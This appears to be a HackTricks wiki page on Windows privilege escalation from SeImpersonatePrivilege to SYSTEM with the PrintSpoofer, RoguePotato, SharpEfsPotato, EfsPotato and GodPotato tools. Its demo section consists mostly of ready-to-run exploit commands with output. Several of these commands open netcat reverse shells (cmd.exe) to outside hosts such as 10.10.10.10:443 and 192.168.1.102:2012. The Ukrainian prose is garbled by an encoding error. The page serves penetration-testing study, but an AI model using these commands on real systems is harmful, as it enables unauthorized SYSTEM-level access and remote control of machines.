# RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato
{% hint style="success" %}
Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: 
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
### [WhiteIntel](https://whiteintel.io)
.png)
[**WhiteIntel**](https://whiteintel.io) - ΡΠ΅ **ΠΏΠΎΡΡΠΊΠΎΠ²Π° ΡΠΈΡΡΠ΅ΠΌΠ°** Π½Π° ΠΎΡΠ½ΠΎΠ²Ρ **ΡΠ΅ΠΌΠ½ΠΎΠ³ΠΎ Π²Π΅Π±Ρ**, ΡΠΊΠ° ΠΏΡΠΎΠΏΠΎΠ½ΡΡ **Π±Π΅Π·ΠΊΠΎΡΡΠΎΠ²Π½Ρ** ΡΡΠ½ΠΊΡΡΡ Π΄Π»Ρ ΠΏΠ΅ΡΠ΅Π²ΡΡΠΊΠΈ, ΡΠΈ Π±ΡΠ»Π° ΠΊΠΎΠΌΠΏΠ°Π½ΡΡ Π°Π±ΠΎ ΡΡ ΠΊΠ»ΡΡΠ½ΡΠΈ **ΡΠΊΠΎΠΌΠΏΡΠΎΠΌΠ΅ΡΠΎΠ²Π°Π½Ρ** **ΡΠΊΡΠ΄Π»ΠΈΠ²ΠΈΠΌΠΈ ΠΏΡΠΎΠ³ΡΠ°ΠΌΠ°ΠΌΠΈ-ΠΊΡΠ°Π΄ΡΡΠΌΠΈ**.
ΠΡΠ½ΠΎΠ²Π½Π° ΠΌΠ΅ΡΠ° WhiteIntel - Π±ΠΎΡΠΎΡΠΈΡΡ Π· Π·Π°Ρ
ΠΎΠΏΠ»Π΅Π½Π½ΡΠΌ ΠΎΠ±Π»ΡΠΊΠΎΠ²ΠΈΡ
Π·Π°ΠΏΠΈΡΡΠ² ΡΠ° Π°ΡΠ°ΠΊΠ°ΠΌΠΈ ΠΏΡΠΎΠ³ΡΠ°ΠΌ-Π²ΠΈΠΌΠ°Π³Π°ΡΡΠ², ΡΠΎ Π²ΠΈΠ½ΠΈΠΊΠ°ΡΡΡ Π²Π½Π°ΡΠ»ΡΠ΄ΠΎΠΊ ΡΠΊΡΠ΄Π»ΠΈΠ²ΠΈΡ
ΠΏΡΠΎΠ³ΡΠ°ΠΌ, ΡΠΎ ΠΊΡΠ°Π΄ΡΡΡ ΡΠ½ΡΠΎΡΠΌΠ°ΡΡΡ.
ΠΠΈ ΠΌΠΎΠΆΠ΅ΡΠ΅ ΠΏΠ΅ΡΠ΅Π²ΡΡΠΈΡΠΈ ΡΡ
Π½ΡΠΉ Π²Π΅Π±ΡΠ°ΠΉΡ Ρ ΡΠΏΡΠΎΠ±ΡΠ²Π°ΡΠΈ ΡΡ
Π½ΡΠΉ Π΄Π²ΠΈΠ³ΡΠ½ **Π±Π΅Π·ΠΊΠΎΡΡΠΎΠ²Π½ΠΎ** Π·Π° Π°Π΄ΡΠ΅ΡΠΎΡ:
{% embed url="https://whiteintel.io" %}
***
{% hint style="warning" %}
**JuicyPotato Π½Π΅ ΠΏΡΠ°ΡΡΡ** Π½Π° Windows Server 2019 ΡΠ° Windows 10 Π²Π΅ΡΡΡΡ 1809 Ρ Π½ΠΎΠ²ΡΡΠ΅. ΠΠ΄Π½Π°ΠΊ, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** ΠΌΠΎΠΆΡΡΡ Π±ΡΡΠΈ Π²ΠΈΠΊΠΎΡΠΈΡΡΠ°Π½Ρ Π΄Π»Ρ **ΠΎΡΡΠΈΠΌΠ°Π½Π½Ρ ΡΠΈΡ
ΡΠ°ΠΌΠΈΡ
ΠΏΡΠΈΠ²ΡΠ»Π΅ΡΠ² Ρ Π΄ΠΎΡΡΡΠΏΡ Π½Π° ΡΡΠ²Π½Ρ `NT AUTHORITY\SYSTEM`**. Π¦Ρ [Π±Π»ΠΎΠ³-ΠΏΡΠ±Π»ΡΠΊΠ°ΡΡΡ](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) Π΄Π΅ΡΠ°Π»ΡΠ½ΠΎ ΠΎΠΏΠΈΡΡΡ ΡΠ½ΡΡΡΡΠΌΠ΅Π½Ρ `PrintSpoofer`, ΡΠΊΠΈΠΉ ΠΌΠΎΠΆΠ½Π° Π²ΠΈΠΊΠΎΡΠΈΡΡΠΎΠ²ΡΠ²Π°ΡΠΈ Π΄Π»Ρ Π·Π»ΠΎΠ²ΠΆΠΈΠ²Π°Π½Π½Ρ ΠΏΡΠΈΠ²ΡΠ»Π΅ΡΠΌΠΈ ΡΠΌΠΏΠ΅ΡΡΠΎΠ½Π°ΡΡΡ Π½Π° Ρ
ΠΎΡΡΠ°Ρ
Windows 10 ΡΠ° Server 2019, Π΄Π΅ JuicyPotato Π±ΡΠ»ΡΡΠ΅ Π½Π΅ ΠΏΡΠ°ΡΡΡ.
{% endhint %}
## Quick Demo
### PrintSpoofer
```bash
c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"
--------------------------------------------------------------------------------
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
NULL
```
### RoguePotato
{% code overflow="wrap" %}
```bash
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
# In some old versions you need to use the "-f" param
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
```
{% endcode %}
### SharpEfsPotato
```bash
> SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
C:\temp>type C:\temp\w.log
nt authority\system
```
### EfsPotato
```bash
> EfsPotato.exe "whoami"
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]
[+] Current user: NT Service\MSSQLSERVER
[+] Pipe: \pipe\lsarpc
[!] binding ok (handle=aeee30)
[+] Get Token: 888
[!] process with pid: 3696 created.
==============================
[x] EfsRpcEncryptFileSrv failed: 1818
nt authority\system
```
### GodPotato
```bash
> GodPotato -cmd "cmd /c whoami"
# You can achieve a reverse shell like this.
> GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
```
### DCOMPotato
## References
* [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)
* [https://github.com/itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer)
* [https://github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato)
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
* [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato)
* [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato)
### [WhiteIntel](https://whiteintel.io)
[**WhiteIntel**](https://whiteintel.io) Ρ **ΠΏΠΎΡΡΠΊΠΎΠ²ΠΎΡ ΡΠΈΡΡΠ΅ΠΌΠΎΡ** Π½Π° ΠΎΡΠ½ΠΎΠ²Ρ **ΡΠ΅ΠΌΠ½ΠΎΠ³ΠΎ Π²Π΅Π±Ρ**, ΡΠΊΠ° ΠΏΡΠΎΠΏΠΎΠ½ΡΡ **Π±Π΅Π·ΠΊΠΎΡΡΠΎΠ²Π½Ρ** ΡΡΠ½ΠΊΡΡΡ Π΄Π»Ρ ΠΏΠ΅ΡΠ΅Π²ΡΡΠΊΠΈ, ΡΠΈ Π±ΡΠ»Π° **ΠΊΠΎΠΌΠΏΠ°Π½ΡΡ** Π°Π±ΠΎ ΡΡ **ΠΊΠ»ΡΡΠ½ΡΠΈ** **ΡΠΊΠΎΠΌΠΏΡΠΎΠΌΠ΅ΡΠΎΠ²Π°Π½Ρ** **ΡΠΊΡΠ΄Π»ΠΈΠ²ΠΈΠΌΠΈ ΠΏΡΠΎΠ³ΡΠ°ΠΌΠ°ΠΌΠΈ** Π΄Π»Ρ ΠΊΡΠ°Π΄ΡΠΆΠΊΠΈ Π΄Π°Π½ΠΈΡ
.
ΠΡΠ½ΠΎΠ²Π½Π° ΠΌΠ΅ΡΠ° WhiteIntel - Π±ΠΎΡΠΎΡΠΈΡΡ Π· Π·Π°Ρ
ΠΎΠΏΠ»Π΅Π½Π½ΡΠΌ ΠΎΠ±Π»ΡΠΊΠΎΠ²ΠΈΡ
Π·Π°ΠΏΠΈΡΡΠ² ΡΠ° Π°ΡΠ°ΠΊΠ°ΠΌΠΈ ΠΏΡΠΎΠ³ΡΠ°ΠΌ-Π²ΠΈΠΌΠ°Π³Π°ΡΡΠ², ΡΠΎ Π²ΠΈΠ½ΠΈΠΊΠ°ΡΡΡ Π²Π½Π°ΡΠ»ΡΠ΄ΠΎΠΊ ΡΠΊΡΠ΄Π»ΠΈΠ²ΠΈΡ
ΠΏΡΠΎΠ³ΡΠ°ΠΌ Π΄Π»Ρ ΠΊΡΠ°Π΄ΡΠΆΠΊΠΈ ΡΠ½ΡΠΎΡΠΌΠ°ΡΡΡ.
ΠΠΈ ΠΌΠΎΠΆΠ΅ΡΠ΅ ΠΏΠ΅ΡΠ΅Π²ΡΡΠΈΡΠΈ ΡΡ
Π½ΡΠΉ Π²Π΅Π±ΡΠ°ΠΉΡ Ρ ΡΠΏΡΠΎΠ±ΡΠ²Π°ΡΠΈ ΡΡ
Π½ΡΠΉ Π΄Π²ΠΈΠ³ΡΠ½ **Π±Π΅Π·ΠΊΠΎΡΡΠΎΠ²Π½ΠΎ** Π·Π° Π°Π΄ΡΠ΅ΡΠΎΡ:
{% embed url="https://whiteintel.io" %}
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}